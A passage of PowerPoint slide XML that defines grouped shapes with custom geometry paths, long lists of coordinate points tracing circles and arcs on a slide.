                  <a:lnTo>
                    <a:pt x="994659" y="578618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="996696" y="530352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994659" y="482085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988666" y="435031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978893" y="389378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965515" y="345312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948710" y="303021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="928652" y="262692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905518" y="224513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879483" y="188670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850725" y="155352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819418" y="124746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785739" y="97039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749864" y="72418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711968" y="51071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672229" y="33185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630821" y="18947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587921" y="8546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543704" y="2167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498348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2451" y="3771899"/>
              <a:ext cx="231648" cy="248412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5241035" y="4809744"/>
            <a:ext cx="1275715" cy="1652270"/>
            <a:chOff x="5241035" y="4809744"/>
            <a:chExt cx="1275715" cy="1652270"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5241035" y="4809744"/>
              <a:ext cx="779145" cy="1652270"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="779145" h="1652270">
                  <a:moveTo>
                    <a:pt x="778763" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="731410" y="1507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684795" y="5972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639001" y="13308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594110" y="23428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550204" y="36247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507366" y="51678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465678" y="69633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425222" y="90028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386079" y="112775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348334" y="137789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312067" y="164982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277361" y="194269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244298" y="225562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212961" y="258776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183431" y="293824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155792" y="330620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130124" y="369077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106510" y="409109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85033" y="450629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65775" y="493552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48818" y="537790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34244" y="583257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22135" y="629867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12574" y="677534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5643" y="726170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424" y="775690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="826007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424" y="876325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5643" y="925845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12574" y="974481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22135" y="1022148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34244" y="1068758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48818" y="1114225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65775" y="1158463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85033" y="1201386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106510" y="1242906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130124" y="1282938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155792" y="1321395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183431" y="1358191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212961" y="1393239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244298" y="1426453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277361" y="1457746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312067" y="1487033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348334" y="1514226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386079" y="1539239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425222" y="1561987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="465678" y="1582382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507366" y="1600337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="550204" y="1615768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594110" y="1628587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639001" y="1638707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684795" y="1646043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="731410" y="1650508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778763" y="1652015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778763" y="1333499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732772" y="1331175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687986" y="1324344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644610" y="1313220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602849" y="1298015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562906" y="1278944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524985" y="1256218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489291" y="1230051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456028" y="1200656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425400" y="1168246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397610" y="1133034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372864" y="1095234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351365" y="1055059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333317" y="1012721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318924" y="968434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308391" y="922410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301921" y="874864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299719" y="826007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301921" y="777151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308391" y="729605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318924" y="683581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333317" y="639294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351365" y="596956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372864" y="556781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397610" y="518981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425400" y="483769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456028" y="451359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489291" y="421964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524985" y="395797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562906" y="373071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602849" y="354000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644610" y="338795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687986" y="327671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732772" y="320840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778763" y="318515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778763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519927" y="5103876"/>
              <a:ext cx="996950" cy="1064260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="996950" h="1064260">
                  <a:moveTo>
                    <a:pt x="498348" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="452991" y="2173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408774" y="8569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365874" y="18998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324466" y="33275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284727" y="51209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246831" y="72615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210956" y="97304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177277" y="125089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145970" y="155781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117212" y="189193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91177" y="225137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68043" y="263426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47985" y="303871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31180" y="346285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17802" y="390480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8029" y="436269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2036" y="483463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="531876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2036" y="580288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8029" y="627482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17802" y="673271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31180" y="717466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47985" y="759880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68043" y="800325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91177" y="838614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117212" y="874558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145970" y="907970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177277" y="938662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210956" y="966447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246831" y="991136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284727" y="1012542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324466" y="1030476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365874" y="1044753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408774" y="1055182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452991" y="1061578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498348" y="1063752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543704" y="1061578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587921" y="1055182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630821" y="1044753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672229" y="1030476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711968" y="1012542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749864" y="991136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785739" y="966447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819418" y="938662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850725" y="907970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879483" y="874558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905518" y="838614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="928652" y="800325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948710" y="759880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965515" y="717466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978893" y="673271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988666" y="627482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994659" y="580288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="996696" y="531876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994659" y="483463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988666" y="436269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978893" y="390480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965515" y="346285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="948710" y="303871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="928652" y="263426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905518" y="225137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879483" y="189193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="850725" y="155781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819418" y="125089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785739" y="97304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749864" y="72615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711968" y="51209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672229" y="33275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630821" y="18998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587921" y="8569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543704" y="2173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498348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2451" y="5509260"/>
              <a:ext cx="231648" cy="251460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1519427" y="4066032"/>
            <a:ext cx="3352800" cy="3352800"/>
            <a:chOff x="1519427" y="4066032"/>
            <a:chExt cx="3352800" cy="3352800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1519427" y="4066032"/>
              <a:ext cx="3352800" cy="3352800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3352800" h="3352800">
                  <a:moveTo>
                    <a:pt x="1676400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1627837" y="689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1579616" y="2747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1531756" y="6153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484276" y="10889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1437194" y="16937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1390529" y="24278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344299" y="32893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1298524" y="42764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253221" y="53872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208410" y="66198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164109" y="79723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1120336" y="94430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1077111" y="110299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034452" y="127312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992377" y="145451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950906" y="164695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910056" y="185028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869847" y="206429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830297" y="228882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791425" y="252366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="753250" y="276864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715789" y="302356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679062" y="328824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643088" y="356250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607885" y="384614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573471" y="413899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539865" y="444085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507087" y="475154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475154" y="507087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444085" y="539865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413899" y="573471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384614" y="607885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356250" y="643088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328824" y="679062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302356" y="715789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276864" y="753250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252366" y="791425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228882" y="830297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206429" y="869847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185028" y="910056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164695" y="950906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145451" y="992377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127312" y="1034452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110299" y="1077111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94430" y="1120336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79723" y="1164109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66198" y="1208410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53872" y="1253221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42764" y="1298524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32893" y="1344299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24278" y="1390529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16937" y="1437194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10889" y="1484276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6153" y="1531756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747" y="1579616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689" y="1627837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1676400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689" y="1724962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747" y="1773183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6153" y="1821043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10889" y="1868523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16937" y="1915605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24278" y="1962270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32893" y="2008500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42764" y="2054275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53872" y="2099578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66198" y="2144389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79723" y="2188690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94430" y="2232463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110299" y="2275688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127312" y="2318347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145451" y="2360422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164695" y="2401893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185028" y="2442743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206429" y="2482952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228882" y="2522502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252366" y="2561374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276864" y="2599549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302356" y="2637010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328824" y="2673737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356250" y="2709711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384614" y="2744914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413899" y="2779328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444085" y="2812934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475154" y="2845712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507087" y="2877645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539865" y="2908714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573471" y="2938900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607885" y="2968185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643088" y="2996549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679062" y="3023975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715789" y="3050443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="753250" y="3075935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791425" y="3100433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830297" y="3123917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="869847" y="3146370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910056" y="3167771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950906" y="3188104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="992377" y="3207348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034452" y="3225487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1077111" y="3242500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1120336" y="3258369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1164109" y="3273076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208410" y="3286601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1253221" y="3298927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1298524" y="3310035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344299" y="3319906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1390529" y="3328521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1437194" y="3335862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484276" y="3341910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1531756" y="3346646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1579616" y="3350052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1627837" y="3352110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676400" y="3352800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1724962" y="3352110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773183" y="3350052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821043" y="3346646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1868523" y="3341910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1915605" y="3335862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1962270" y="3328521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2008500" y="3319906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054275" y="3310035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099578" y="3298927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2144389" y="3286601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2188690" y="3273076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2232463" y="3258369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2275688" y="3242500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2318347" y="3225487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2360422" y="3207348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2401893" y="3188104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442743" y="3167771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2482952" y="3146370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2522502" y="3123917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2561374" y="3100433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2599549" y="3075935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2637010" y="3050443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673737" y="3023975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2709711" y="2996549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2744914" y="2968185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779328" y="2938900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812934" y="2908714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2845712" y="2877645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2877645" y="2845712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908714" y="2812934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2938900" y="2779328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2968185" y="2744914"/>
                  </a:lnTo>
                  <a:lnTo>
